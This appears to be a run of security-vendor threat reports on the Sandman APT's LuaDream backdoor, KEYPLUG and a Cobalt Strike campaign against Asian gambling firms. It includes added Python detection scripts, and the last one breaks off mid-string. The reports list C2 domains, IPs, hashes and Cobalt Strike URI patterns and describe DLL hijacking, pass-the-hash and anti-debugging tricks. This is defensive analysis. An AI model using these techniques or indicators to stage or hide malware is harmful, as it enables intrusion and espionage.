KEYPLUG: Global buffer structure (IDA-defined structure)

LuaDream and KEYPLUG implement designated functions for reading from, and writing to, these buffers. These functions synchronize buffer access by multiple threads using Windows Critical Sections.

LuaDream: Reading C2 data from a global buffer

KEYPLUG: Reading C2 data from a global buffer

Throughout their execution, both LuaDream and KEYPLUG generate one-time integer values based on the system uptime returned by the GetTickCount function. The backdoors calculate these values by applying modulo and/or addition operations to the system uptime. Some overlapping uses of the generated values are as sleep time intervals or protocol-specific keys, such as the Sec-WebSocket-Key packet header field that is used in the WebSocket opening handshake.

LuaDream: Sleep interval

KEYPLUG: Sleep interval

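The report does not give the formula by which the backdoors derive the Sec-WebSocket-Key from GetTickCount, so the following added example (Python written for this page, not code from the report or from either backdoor) does not reproduce it. It shows what a defender can check in captured WebSocket handshakes against RFC 6455: that the client key is a well-formed 16-byte Base64 nonce, that keys are not reused across connections, and that the server's Sec-WebSocket-Accept is the expected SHA-1 of key plus the protocol GUID. Whether tick-derived keys fail these checks is a hypothesis to test against real captures. The handshakes are constructed and the host name example.invalid is a placeholder.

```python
import base64
import binascii
import hashlib
from collections import Counter

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed GUID from RFC 6455


def is_wellformed_key(key: str) -> bool:
    """RFC 6455 section 4.1: Base64 of a randomly selected 16-byte value."""
    try:
        raw = base64.b64decode(key, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) == 16 and base64.b64encode(raw).decode() == key


def expected_accept(key: str) -> str:
    """Sec-WebSocket-Accept = Base64(SHA-1(key || GUID))."""
    digest = hashlib.sha1((key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode()


def parse_headers(raw: str) -> dict:
    """Lower-cased header map from a raw HTTP request or response."""
    out = {}
    for line in raw.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            out[name.strip().lower()] = value.strip()
    return out


def audit(handshakes):
    """handshakes: list of (client_request, server_response) strings.
    Returns (index, finding) tuples; an empty list means nothing deviates."""
    findings, seen = [], Counter()
    for i, (req, resp) in enumerate(handshakes):
        key = parse_headers(req).get("sec-websocket-key", "")
        accept = parse_headers(resp).get("sec-websocket-accept", "")
        if not is_wellformed_key(key):
            findings.append((i, "malformed-key"))
        seen[key] += 1
        if seen[key] > 1:
            findings.append((i, "reused-key"))
        if accept != expected_accept(key):
            findings.append((i, "bad-accept"))
    return findings


# Constructed handshakes. RFC_KEY is the example nonce from RFC 6455.
RFC_KEY = "dGhlIHNhbXBsZSBub25jZQ=="
ZERO_KEY = base64.b64encode(b"\x00" * 16).decode()


def _req(key):
    return ("GET /chat HTTP/1.1\r\nHost: example.invalid\r\nUpgrade: websocket\r\n"
            f"Connection: Upgrade\r\nSec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n\r\n")


def _resp(accept):
    return ("HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\n"
            f"Connection: Upgrade\r\nSec-WebSocket-Accept: {accept}\r\n\r\n")


HANDSHAKES = [
    (_req(RFC_KEY), _resp("s3pPLMBiTxaQ9kYGzzhZRbK+xOo=")),  # clean, per the RFC
    (_req(ZERO_KEY), _resp(expected_accept(ZERO_KEY))),      # well-formed
    (_req(ZERO_KEY), _resp(expected_accept(ZERO_KEY))),      # same nonce again
    (_req("abc"), _resp("AAAA")),                            # malformed key, wrong accept
]

if __name__ == "__main__":
    print(audit(HANDSHAKES))
```

A key that repeats across connections from one host is the most likely symptom of a low-entropy derivation, and a server that accepts such keys (or returns an incorrect Accept value) is not a standard WebSocket endpoint; both are cheap checks on existing proxy or NDR logs.
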
Conclusions

We assess that there are strong overlaps in operational infrastructure, targeting, and TTPs associating the Sandman APT with China-based adversaries using the KEYPLUG backdoor, STORM-0866/Red Dev 40 in particular. This highlights the complex nature of the Chinese threat landscape. Its constituent threat actors will almost certainly continue to cooperate and coordinate, exploring new approaches to upgrade the functionality, flexibility, and stealthiness of their malware. The adoption of the Lua development paradigm is a compelling illustration of this.

Navigating the threat landscape calls for continuous collaboration and information sharing within the threat intelligence research community. SentinelLabs remains committed to this mission and is grateful to our industry partners involved in this collective endeavor.

Indicators of Compromise

Domains

dan.det-ploshadka[.]com KEYPLUG C2 server
mode.encagil[.]com LuaDream C2 server
ssl.articella[.]com Suspected KEYPLUG or LuaDream C2 server
ssl.e-novauto[.]com KEYPLUG C2 server
ssl.explorecell[.]com LuaDream C2 server
yum.luxyries[.]com KEYPLUG C2 server

IP Addresses

146.70.157[.]20 KEYPLUG C2 server (based on known C2 certificates)
172.67.216[.]63 KEYPLUG C2 server
185.38.142[.]129 KEYPLUG C2 server (based on a known C2 certificate)
185.51.134[.]27 LuaDream and KEYPLUG C2 server (based on known C2 certificates)
185.82.218[.]230 LuaDream C2 server
37.120.140[.]205 KEYPLUG C2 server (based on a known C2 certificate)
45.129.199[.]122 KEYPLUG C2 server (based on a known C2 certificate)
45.80.148[.]151 LuaDream C2 server (based on a known C2 certificate)
45.90.59[.]17 KEYPLUG C2 server (based on a known C2 certificate)
5.2.67[.]176 KEYPLUG C2 server (based on a known C2 certificate)
5.2.72[.]130 KEYPLUG C2 server (based on a known C2 certificate)
5.255.88[.]188 KEYPLUG C2 server (based on a known C2 certificate)
79.110.52[.]160 KEYPLUG C2 server

Certificate Thumbprints

a7932112b7880c95d77bc36c6fcced977f4a5889 KEYPLUG C2
b6d759c9ea5d2136bacb1b2289a31c33500c8de8 KEYPLUG C2
fc8fdf58cd945619cbfede40ba06aada10de9459 LuaDream C2

Sandman APT | A Mystery Group Targeting Telcos with a LuaJIT Toolkit

21 September 2023 at 19:50

By Aleksandar Milenkoski, in collaboration with QGroup

Executive Summary

  • SentinelLabs has observed a new threat activity cluster by an unknown threat actor we have dubbed Sandman.
  • Sandman has been primarily targeting telecommunication providers in the Middle East, Western Europe, and the South Asian subcontinent.
  • The activities are characterized by strategic lateral movements and minimal engagements, likely to minimize the risk of detection.
  • Sandman has deployed a novel modular backdoor utilizing the LuaJIT platform, a relatively rare occurrence in the threat landscape. We refer to this malware as LuaDream.
  • The implementation of LuaDream indicates a well-executed, maintained, and actively developed project of a considerable scale.
  • At this time, we donโ€™t have a consistent sense of attribution. LuaDream does not appear to be related to any known threat actors. While the development style is historically associated with a specific type of advanced threat actor, inconsistencies between the high-end development of the malware and poor segmentation practices lead us towards the possibility of a private contractor or mercenary group similar to Metador.

Overview

In collaboration with QGroup GmbH, SentinelLabs observed over August 2023 a threat activity cluster targeting the telecommunication sector. The activities have been conducted by a threat actor of unknown origin using a novel modular backdoor based on the LuaJIT platform. We dub this threat actor and the backdoor Sandman and LuaDream in reference to what we suspect to be the backdoorโ€™s internal name โ€“ DreamLand client.

The activities we observed are characterized by strategic lateral movement to specific targeted workstations and minimal engagement, suggesting a deliberate approach aimed at achieving the set objectives while minimizing the risk of detection.

The implementation and architecture of LuaDream suggest a maintained, versioned project under active development. This is a modular, multi-protocol backdoor whose main functionalities are:

  • exfiltrating system and user information, paving the way for further precision attacks;
  • managing attacker-provided plugins that extend LuaDreamโ€™s features.

Although the intrusions were detected and interrupted before the threat actor could deploy plugins, our analysis of LuaDream staging samples shared on VirusTotal provided a glimpse into what functionalities the plugins may implement, with command execution capabilities being one example.

The 36 distinct LuaDream components we identified and the support for multiple protocols for C2 communication indicate a project of a considerable scale. The LuaDream staging chain is designed to evade detection and thwart analysis while deploying the malware directly into memory. LuaDreamโ€™s implementation and staging process leverage the LuaJIT platform, the just-in-time compiler for the Lua scripting language. This is primarily to make malicious Lua script code difficult to detect.

A Penchant for Telcos

Based on current visibility, accurate clustering remains a challenge. The focused, strategy-driven activities and the use of complex malware designed to evade detection point to a motivated and capable adversary. The TTPs, victimology, and the characteristics of the deployed malware indicate that it is highly likely this activity has espionage motivations. Communication providers are frequent targets of espionage activity due to the sensitive data they hold.

The activity cluster we observed and examination of C2 netflow data indicate a pronounced focus on targeting telecommunications providers with a broad geographical distribution, including the Middle East, Western Europe, and the South Asian subcontinent.

Geographical distribution of victims

Compilation timestamps and a string artifact found within LuaDream hint at potential malware development efforts over the first half of 2022, suggesting possible threat actor activity dating back to 2022.

While we cannot associate LuaDream to any known threat actor, we lean towards the possibility of a private contractor or mercenary group. Typically used as a scripting middleware in gaming and specialty embedded applications and appliances, the use of LuaJIT in the context of APT malware is relatively rare but the population using it is becoming broader.

Embedded Lua VMs serve as a mechanism for modularity and extensibility for advanced APTs, historically considered Western or Western-aligned. However, this development paradigm is being embraced by a broader set of threat actors that also target Western countries and deserves further scrutiny, as exemplified by the Sandman APT. Our talk at LABScon 2023 described this paradigm of development over time, bookended by our discovery of Sandman APT as the latest example and Fast16 as the earliest, dating back to 2005.

In March 2023, Kaspersky briefly described, in a quarterly roundup, new malware actively targeting a government entity in Pakistan. Based on the sparsely described characteristics, we assess that they are referring to a variant of LuaDream, which they dubbed DreamLand. Note the following string in the LuaDream samples we identified:

C:\\project\\tenyears\\DreamLandClient\\Project\\cpp\\HttpClientLj\\testdll.dll

Threat Actor Activities

The activities we observed took place over several weeks in August 2023. After stealing administrative credentials and conducting reconnaissance, Sandman infiltrated specifically targeted workstations using the pass-the-hash technique over the NTLM authentication protocol. On one of the targets, all of the workstations were assigned to personnel in managerial positions.

On average, we observed a five-day gap between infiltrations of different endpoints. After gaining access, Sandman limited its activities to deploying the folders and files required for loading and executing LuaDream, refraining from any further actions. We observed the following deployed filesystem artifacts:

C:\Windows\System32\ualapi.dll
C:\ProgramData\FaxConfig\fax.dat
C:\ProgramData\FaxConfig\fax.cache
C:\ProgramData\FaxConfig\fax.module
C:\ProgramData\FaxConfig\fax.Application
C:\ProgramData\FaxLib\

Sandman abused the DLL hijacking technique to execute LuaDream. The ualapi.dll file they placed is a malicious DLL masquerading as its legitimate counterpart (a User Access Logging (UAL) component) and represents the first stage of the intricate LuaDream loading process. The ualapi.dll library is loaded by the Fax and Spooler Windows services when they start. We observed the Spooler service loading the malicious ualapi.dll on the targeted workstations, executing LuaDream in its context.

It is relevant to note that we did not observe the threat actor restarting the Fax or Spooler service to force the execution of LuaDream, likely to evade detection based on service manipulation. Instead, they waited for one of these services to load the malicious ualapi.dll when started at the next system boot.
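
To turn the loading chain above into a host detection, here is an added example in Python (written for this page, not a detection shipped with the report) that runs two checks over Sysmon events: Event ID 7 (ImageLoad) records where the Spooler (spoolsv.exe) or Fax (fxssvc.exe) service binary loads a ualapi.dll that does not carry a valid Microsoft signature, and Event ID 11 (FileCreate) records under the C:\ProgramData\FaxConfig\ and C:\ProgramData\FaxLib\ staging directories named above. The field names are Sysmon's; the events themselves are constructed, not real telemetry.

```python
# Service binaries that load ualapi.dll at start-up, per the text (Spooler and Fax).
WATCHED_LOADERS = {"c:\\windows\\system32\\spoolsv.exe", "c:\\windows\\system32\\fxssvc.exe"}
# Staging directories observed in the intrusion.
STAGING_DIRS = ("c:\\programdata\\faxconfig\\", "c:\\programdata\\faxlib\\")

# Constructed Sysmon events trimmed to the fields the checks use.
EVENTS = [
    {"EventID": 7, "Image": "C:\\Windows\\System32\\spoolsv.exe",
     "ImageLoaded": "C:\\Windows\\System32\\localspl.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\spoolsv.exe",
     "ImageLoaded": "C:\\Windows\\System32\\ualapi.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 11, "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\ProgramData\\FaxConfig\\fax.dat"},
    {"EventID": 11, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetFilename": "C:\\ProgramData\\Microsoft\\Windows\\WER\\report.txt"},
]


def is_microsoft_signed(ev: dict) -> bool:
    """True only for a validated Microsoft signature; a genuine ualapi.dll would pass."""
    return (ev.get("Signed", "").lower() == "true"
            and ev.get("SignatureStatus", "") == "Valid"
            and ev.get("Signature", "").startswith("Microsoft"))


def check_event(ev: dict):
    """Return a finding string for one event, or None."""
    if ev["EventID"] == 7:
        loader = ev["Image"].lower()
        loaded = ev["ImageLoaded"].lower()
        if (loader in WATCHED_LOADERS and loaded.endswith("\\ualapi.dll")
                and not is_microsoft_signed(ev)):
            return f"unsigned-ualapi-load: {ev['Image']} loaded {ev['ImageLoaded']}"
    elif ev["EventID"] == 11:
        if ev["TargetFilename"].lower().startswith(STAGING_DIRS):
            return f"faxconfig-staging-write: {ev['Image']} created {ev['TargetFilename']}"
    return None


def hunt(events):
    """All findings over a sequence of events, in input order."""
    return [f for f in (check_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(finding)
```

Because the operator waited for a reboot rather than restarting the service, the file-creation check is the one that fires first; the image-load check confirms execution later, in the service's context, which is why both are kept.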

LuaDream | Staging

The LuaDream staging process is intricate and designed with a focus on evading detection and thwarting analysis. Initiated by the Fax or the Spooler service, which would execute the UalStart export of the malicious ualapi.dll when started, the overall process consists of seven main stages. These are conducted fully in memory and involve a combination of fully-formed DLL PE images, code, and LuaJIT bytecode.

The following table shows DLL images involved in LuaDream staging:

Name                  Compilation timestamp      Exports
ualapi.dll            Wed Aug 09 18:24:18 2023   UalInstrument, UalStart, UalStop
MemoryLoadPex64.dll   Wed Mar 22 23:55:07 2023   ProtectMain
common.dll            Wed Aug 09 18:21:18 2023   jsadebugd

Although the DLL timestamps could have been manipulated by the threat actor, given the proximity to the August 2023 intrusion date, it is likely that the timestamps are authentic. Due to the difference of only a few days between the timestamps of ualapi.dll and common.dll, and their actual deployment dates, it is possible that these images have been built specifically for this intrusion.

Some of the implemented anti-analysis measures include hiding LuaDream’s threads from a debugger using the NtSetInformationThread function (ThreadHideFromDebugger), a file close operation on an invalid handle (0x123456), a known trick that raises an exception only when a debugger is attached, detection of Wine-based sandboxes, and in-memory mapping of malicious PE images to evade EDR API hooks and file-based detections.

LuaDream staging

Next-stage code is typically packed using a combination of XOR-based encryption and compression. The fax.dat, fax.Application, and fax.module files store packed staging code. The code unpacked from fax.Application contains a LuaJIT engine enabling the execution of the LuaJIT components internally referred to as interface and crt as well as LuaDream itself.

interface unpacks crt from fax.module, which in turn retrieves XML-formatted configuration and the contents of the fax.cache file – an encrypted and compressed Lua function, which returns the reference names and implementations of LuaDream components in Base-64 encoded form.

fax.cache (unpacked form)

The LuaDream configuration includes C2 and communication protocol information. The LuaDream variant we analyzed is configured to communicate with the mode.encagil[.]com domain over the WebSocket protocol.

Configuration data

LuaDream | Overview

LuaDream is a multi-component and multi-protocol backdoor, whose main features are managing attacker-provided plugins and exfiltrating system and user information. The implementation and architecture of LuaDream indicate that it is a maintained, actively developed project of a considerable scale.

Throughout our analysis, we observed what is likely a malware version string (12.0.2.5.23.29), which the backdoor sends to the C2 server when exfiltrating information. Many LuaDream function and variable definitions follow a naming convention involving the word fun, such as dofun, _RUN_FUN_LIST_, and FunGetDataCache.

LuaDream implements testing functions as well as error and execution status logging, which indicates that the malware is likely still in active development. A string artifact in a function labeled com_TestJson suggests potential development in June 2022.



Testing functions (decompiled LuaJIT bytecode)

We observed the embedded private IP address 10.2.101[.]99 to which LuaDream binds the communication port 4443, if so configured. This address does not belong to the IP address spaces of the targeted environments. The IP address may be a leftover from an in-development LuaDream variant or from a previous Sandman engagement.

LuaDream | Components And Features

The LuaDream variant we obtained from the targeted environments consists of 34 components: 13 core and 21 support components. They are implemented in LuaJIT bytecode and use the Windows API through the ffi library using C language bindings.

The support components implement Lua libraries as well as Windows API definitions required for LuaDream’s operation, such as xml2lua, Windows Sockets, and NtSec API.

The core components implement LuaDream features, such as initialization, gathering system and user information, C2 communication, and plugin management. As per the component definitions from the fax.cache file, the core LuaDream components are structured into two categories: .com and .main.

LuaDream core components

With the main component initializing LuaDream, the backdoor connects to the configured C2 server and exfiltrates system, user, and malware-related information gathered by BGetSystemMsg. This information includes the malware version, assigned IP and MAC addresses, OS version, available memory, and the name, PID, and username associated with the process in whose context LuaDream runs.

Exfiltrated information

LuaDream has the capability to reach out to C2 servers but also to act as an implant listening for incoming connections. The backdoor can communicate over the TCP, HTTPS, WebSocket, and QUIC protocols. The main_proto_X_TcpClient, main_proto_WinHttpClient, main_proto_X_WebSocketClient, and main_proto_X_QuicClient components implement support for these protocols, with main_z_protoInterface acting as their main handler.

Protocol handling (decompiled LuaJIT bytecode)

The main_proto_A_QueryDns component resolves domains to IP addresses using the cloudflare-dns[.]com service, which main_proto_X_WebSocketClient uses for resolving C2 domain names.

main_proto_X_QuicClient draws functionalities from a DLL image which LuaDream maps fully in memory, a functionality implemented by the Acom_LoadDLL component.

LuaDream communicates with a C2 server using the thread_connect, thread_send, and thread_recv components, which are responsible for connecting to, sending data to, and receiving data from the C2 server, respectively. These components operate in separate threads. The exchanged data is in JSON and XML format, in an encrypted and compressed form. The Acom_define component provides functionalities for inter-thread communication and data manipulation.

The thread_recv component handles incoming messages and its main purpose is to manage attacker-provided plugins that extend LuaDream. Some functionalities of this component include:

  • taking LuaDream offline (command offline);
  • loading, executing (command loadplugin), unloading (command unloadplugin), and saving plugins (command saveplugin);
  • executing an attacker-specified plugin functionality.

LuaDream maintains a key-based list of plugin information, which includes the handle and the ID of the thread in which the plugin runs, and a plugin-identifying key. Loading of a plugin involves inserting a new entry in this list and executing plugin code in a designated thread. For communicating with plugins, LuaDream leverages inter-thread communication, using the message 1234 for executing plugin functionalities.

LuaDream plugin list (from decompiled LuaJIT bytecode)

Our analysis of LuaDream staging samples shared on VirusTotal revealed the existence of two additional components named main_proto_WinHttpServer and thread_test. main_proto_WinHttpServer implements a LuaDream capability to listen for incoming connections based on the Windows HTTP server API. thread_test implements functions for testing the loadplugin and saveplugin commands. These functions indicate the existence of a plugin named cmd, whose name suggests command execution capabilities.

cmd plugin references

Network Infrastructure

The LuaDream samples we analyzed communicate with the C2 servers ssl.explorecell[.]com and mode.encagil[.]com. ssl.explorecell[.]com is a Tucows-registered domain with a first-seen resolution date of March 2023. This domain last resolved to 185.82.218[.]230, an IP address of a server hosted in Bulgaria by the ITLDC hosting provider.

mode.encagil[.]com is an Arsys-registered domain with a first-seen resolution date of August 2023. The domain last resolved to 172.67.173[.]208 and 104.21.47[.]226, IP addresses of a server hosted behind a major load balancing platform. The shift from using a directly exposed C2 server IP address to addresses of a load balancing infrastructure marks a change in Sandman’s infrastructure management practices – likely to avoid exposing the true hosting location.

Examination of C2 netflow data revealed a lack of comprehensive C2 infrastructure segmentation, with several LuaDream deployments at geographically dispersed victim environments communicating with the same C2 server.

Conclusions

Attributing Sandman remains a mystery, placing it in the same enigmatic category as Metador and other elusive threat actors who operate with impunity. LuaDream stands as a compelling illustration of the continuous innovation and advancement efforts that cyber espionage threat actors pour into their ever-evolving malware arsenal.

Navigating the shadows of the threat landscape necessitates consistent cooperation and information sharing within the threat intelligence research community. SentinelLabs remains dedicated to this mission and hopes that this publication will serve as a catalyst for further collaborative efforts. We are grateful for the contributions of Luca Palermo from the SentinelOne EMEA IR TAM team, who assisted with the initial investigations and remediation of the threat.

Indicators of Compromise

SHA1 File name
1cd0a3dd6354a3d4a29226f5580f8a51ec3837d4 fax.dat
27894955aaf082a606337ebe29d263263be52154 fax.Application
5302c39764922f17e4bc14f589fa45408f8a5089 ualapi.dll
77e00e3067f23df10196412f231e80cec41c5253 fax.cache
b9ea189e2420a29978e4dc73d8d2fd801f6a0db2 UpdateCheck.dll
fb1c6a23e8e0693194a365619b388b09155c2183 updater.ver
ff2802cdbc40d2ef3585357b7e6947d42b875884 fax.module

LuaDream Folder File paths
%ProgramData%\FaxConfig
%ProgramData%\FaxLib

C2 Server Domains
mode.encagil[.]com
ssl.explorecell[.]com

Chinese Entanglement | DLL Hijacking in the Asian Gambling Sector

17 August 2023 at 09:55

By Aleksandar Milenkoski and Tom Hegel

Executive Summary

  • SentinelLabs has identified suspected Chinese malware and infrastructure potentially involved in China-associated operations directed at the gambling sector within Southeast Asia.
  • The threat actors drop Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons.
  • We’ve observed related malware using the signature of a likely stolen code signing certificate issued to PMG PTE LTD, a Singapore-based vendor of Ivacy VPN services.
  • Indicators point to the China-aligned BRONZE STARLIGHT group; however, the exact grouping remains unclear due to the interconnected relationships among various Chinese APT groups.

Overview

Thriving after China’s crackdown on its Macao-based gambling industry, the Southeast Asian gambling sector has become a focal point for the country’s interests in the region, particularly data collection for monitoring and countering related activities in China.

We observed malware and infrastructure likely related to China-aligned activities targeting this sector. The malware and infrastructure we analyze are related to indicators observed in Operation ChattyGoblin and are likely part of the same activity cluster. Operation ChattyGoblin is ESET’s name for a series of attacks by China-nexus actors targeting Southeast Asian gambling companies with trojanized Comm100 and LiveHelp100 chat applications.

The targeting, used malware, and C2 infrastructure specifics point to past activities that third parties have linked to the China-aligned BRONZE STARLIGHT group (also known as DEV-0401 or SLIME34). This is a suspected Chinese ‘ransomware’ group whose main goal appears to be espionage rather than financial gain, using ransomware as a means of distraction or misattribution. Team T5 has also reported on BRONZE STARLIGHT’s politically-motivated involvement in targeting the Southeast Asian gambling industry.

Despite the indicators observed, accurate clustering remains challenging. The Chinese APT ecosystem is plagued by extensive sharing of malware and infrastructure management processes between groups, making high confidence clustering difficult based on current visibility. Our analysis has led us to historical artifacts that represent points of convergence between BRONZE STARLIGHT and other China-based actors, which showcases the complexity of a Chinese threat ecosystem composed of closely affiliated groups.

Background

ESET reported that a ChattyGoblin-related attack in March 2023 targeted the support agents of a gambling company in the Philippines. In the attack, a trojanized LiveHelp100 application downloaded a .NET malware loader named agentupdate_plugins.exe. The final payload was a Cobalt Strike beacon using the duckducklive[.]top domain for C2 purposes. The hash of this malware loader was not disclosed.

We subsequently identified malware loaders that we assess are closely related to those observed as part of Operation ChattyGoblin and are likely part of the same activity cluster – a .NET executable also named agentupdate_plugins.exe and its variant AdventureQuest.exe.

This association is based on naming conventions, code, and functional overlaps with the sample described in ESET’s report. Although we cannot conclusively determine whether the agentupdate_plugins.exe we analyzed is the same as that reported by ESET, we note that one of its VirusTotal submissions is dated March 2023 and originates from the Philippines. This aligns with the geolocation of the target and the timeline of the ChattyGoblin-related attack involving agentupdate_plugins.exe.

The Malware Loaders

agentupdate_plugins.exe and AdventureQuest.exe deploy .NET executables based on the SharpUnhooker tool, which download second-stage data from Alibaba buckets hosted at agenfile.oss-ap-southeast-1.aliyuncs[.]com and codewavehub.oss-ap-southeast-1.aliyuncs[.]com. The second-stage data is stored in password-protected zip archives.

The zip archives downloaded by agentupdate_plugins.exe and AdventureQuest.exe contain sideloading capabilities. Each of the archives we were able to retrieve consists of a legitimate executable vulnerable to DLL search order hijacking, a malicious DLL that gets sideloaded by the executable when started, and an encrypted data file named agent.data.

The executables are components of the software products Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan. The malicious DLLs masquerade as their legitimate counterparts: they export functions with the same names, such that specific functions, when invoked by the legitimate executables, decrypt and execute code embedded in the data files. The data files we could retrieve implement Cobalt Strike beacons.

Zip archive (downloading loader) | Archive content | Final payload
adobe_helper.zip (agentupdate_plugins.exe) | Adobe CEF Helper.exe, libcef.dll, agent.data (not available) | n/a
cefhelper.zip (AdventureQuest.exe) | identity_helper.exe, msedge_elf.dll, agent.data | Cobalt Strike, C2: www.100helpchat[.]com
Agent_bak.zip (AdventureQuest.exe) | mfeann.exe, LockDown.dll, agent.data | Cobalt Strike, C2: live100heip[.]com

The 100helpchat[.]com and live100heip[.]com C2 domains follow the naming convention of the LiveHelp100 trojanized application used in Operation ChattyGoblin, possibly to make malicious network activity look like legitimate LiveHelp100 activity.

agentupdate_plugins.exe and AdventureQuest.exe implement geofencing based on the ifconfig.co IP-based geolocation service. The loaders are meant to stop their execution if they are run on a machine located in the United States, Germany, France, Russia, India, Canada, or the United Kingdom. This may indicate that the threat actors have no interest in intrusions in these countries for this campaign. Due to errors in implementation, the geofencing fails to work as intended.

Stolen Ivacy VPN Certificate

AdventureQuest.exe is signed using a certificate issued to the Ivacy VPN vendor PMG PTE LTD:

  • Thumbprint: 62E990CC0A26D58E1A150617357010EE53186707
  • Serial number: 0E3E037C57A5447295669A3DB1A28B8A.

Ivacy has been present on the market since 2007 and attracts users with low-price offerings.

It is likely that at some point the PMG PTE LTD signing key has been stolen – a familiar technique of known Chinese threat actors to enable malware signing. VPN providers are critical targets, since they enable threat actors to potentially gain access to sensitive user data and communications.

At the time of writing, we have not observed any public statements by PMG PTE LTD clarifying the circumstances that have led to the use of their signing keys for signing malware. The DigiCert Certificate Authority has revoked the compromised certificate after a public discussion on the issue.

HUI Loader

The malicious DLLs libcef.dll, msedge_elf.dll, and LockDown.dll distributed by agentupdate_plugins.exe and AdventureQuest.exe are HUI Loader variants. HUI Loader is a custom malware loader shared between several China-nexus groups. The loader is executed through sideloading by legitimate executables vulnerable to DLL hijacking and stages a payload stored in an encrypted file. HUI Loader variants may differ in implemented payload staging and execution techniques as well as additional functionalities, such as establishing persistence and disabling security features.

libcef.dll, msedge_elf.dll, and LockDown.dll closely resemble HUI Loader variants observed in a string of cyberespionage and ransomware operations that third parties have linked to APT10, TA410, and BRONZE STARLIGHT.

Threat actor | Description
BRONZE STARLIGHT (aliases: DEV-0401, SLIME34) | A China-based ransomware operator active since 2021. The group is known for deploying a variety of ransomware families, such as LockFile, AtomSilo, NightSky, LockBit 2.0, and Pandora, and shares tooling with APT10. BRONZE STARLIGHT’s main goal is suspected to be espionage rather than financial gain, using ransomware as a means of distraction or misattribution.
APT10 (aliases: BRONZE RIVERSIDE, MenuPass) | A China-nexus cyberespionage group active since at least 2009. The group focuses on targeting entities considered strategically important by the Chinese state.
TA410 | A China-nexus cyberespionage group loosely linked to APT10, tracked as a distinct entity. The group is mostly known for targeting the US utilities sector and Middle Eastern governments.

APT10 and TA410 Operations

The cef_string_map_key function of libcef.dll downloaded by agentupdate_plugins.exe references the C:\Users\hellokety.ini file.

The cef_string_map_key function

HUI Loader variants with this exact artifact have been reported as part of several cyberespionage operations:

  • enSilo (now Fortinet) has disclosed cyberespionage activities in Southeast Asia observed in April 2019 and attributed them with medium confidence to APT10.
  • Researchers from Macnica, Secureworks, and Kaspersky have presented on A41APT campaign activity conducted throughout 2021. A41APT is a long-running cyberespionage campaign targeting Japanese companies and their overseas branches. Kaspersky has attributed earlier A41APT activity (from March 2019 to the end of December 2020) with high confidence to APT10. TrendMicro has attributed A41APT activity over 2020 and 2021 to a group they track as Earth Tengshe, noting that Earth Tengshe is related to APT10 with some differences in employed TTPs.
  • ESET has presented on TA410 activities, noting the hellokety.ini artifact in this context. ESET also notes the possibility that the April 2019 activities reported by Fortinet were misattributed to APT10 instead of TA410.

HUI Loader variants (hellokety.ini) used in APT10 and TA410 operations

BRONZE STARLIGHT Operations

Since around 2021, HUI Loader variants have been deployed in operations involving the ransomware families LockFile (Symantec, 2021; NSFOCUS, 2021), AtomSilo (Sophos, 2021), NightSky (Microsoft, 2021), LockBit 2.0 (SentinelLabs, 2022), and Pandora (TrendMicro, 2022). Some of these operations have been attributed to BRONZE STARLIGHT by the organizations disclosing them and all of them collectively by Secureworks. All of these ransomware families have been noted by Microsoft as being part of the BRONZE STARLIGHT arsenal in time intervals aligning with those of the previously mentioned operations.

C2 Infrastructure

The Cobalt Strike C2 GET and POST URIs associated with the Operation ChattyGoblin domain duckducklive[.]top contain /functionalStatus and /rest/2/meetings, respectively. Their uncommon full forms closely resemble those observed by Secureworks in AtomSilo, Night Sky, and Pandora operations they attribute to BRONZE STARLIGHT. The researchers reported that, as of June 2022, they had not seen this Cobalt Strike configuration associated with other ransomware families. The threat actors have likely adapted a public Cobalt Strike malleable C2 profile available in a GitHub repository of the user xx0hcd.

Cobalt Strike C2 POST URI | Relation
/rest/2/meetingsmCRW64qPFqLKw7X56lR41fx | Operation ChattyGoblin
/rest/2/meetingsVDcrCtBuGm8dime2C5zQ3EHbRE156AkpMu6W | AtomSilo
/rest/2/meetingsQpmhJveuV1ljApIzpTAL | Night Sky
/rest/2/meetingsKdEs85OkdgIPwcqbjS7uzVZKBIZNHeO4r5sKe | Pandora

The C2 GET and POST URIs associated with the www.100helpchat[.]com and live100heip[.]com domains we observed contain /owa followed by character strings. The format of these strings resembles those in the URIs associated with duckducklive[.]top and also those reported in past BRONZE STARLIGHT activities. It is likely that the threat actors have adapted another open source Cobalt Strike malleable C2 profile, which is also available in a GitHub repository of the user xx0hcd.

Domain | Cobalt Strike C2 URIs
live100heip[.]com
  GET: /owa/Z7bziD-BDtV9U1aLS9AhW4jyN1NEOelTEi
  POST: /owa/LAC9kgQyM1HD3NSIwi–mx9sHB3vcmjJJm
www.100helpchat[.]com
  GET: /owa/aLgnP5aHtit33SA2p2MenNuBmYy
  POST: /owa/XF0O-PjSCEslnDo51T0K4TOY

The Cobalt Strike profiles associated with the duckducklive[.]top, www.100helpchat[.]com, and live100heip[.]com domains share a C2 port number (8443) and a watermark (391144938). The earliest record of duckducklive[.]top becoming active is dated 24 Feb 2023. The earliest records of live100heip[.]com and 100helpchat[.]com becoming active are dated 24 Feb 2023 (overlapping with that of duckducklive[.]top) and 28 Feb 2023, respectively.
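The two URI shapes above (/functionalStatus plus /rest/2/meetings<token>, and /owa/<token>) can be hunted for in web proxy logs. The following Python is an added example, not code from the report: it matches each request path against those shapes and records whether the request used the shared C2 port 8443; the log lines are constructed for this example, reusing the hosts and URI tokens listed in the report, with two legitimate Exchange and REST requests included to show the patterns do not fire on them.

```python
import re
from urllib.parse import urlparse

# Constructed proxy log (not from the report). Field layout assumed here:
# "<timestamp> <client_ip> <method> <url> <status>". Hosts and URI tokens
# in lines 1-4 are the report's indicators; lines 5-6 are benign look-alikes.
SAMPLE_PROXY_LOG = """\
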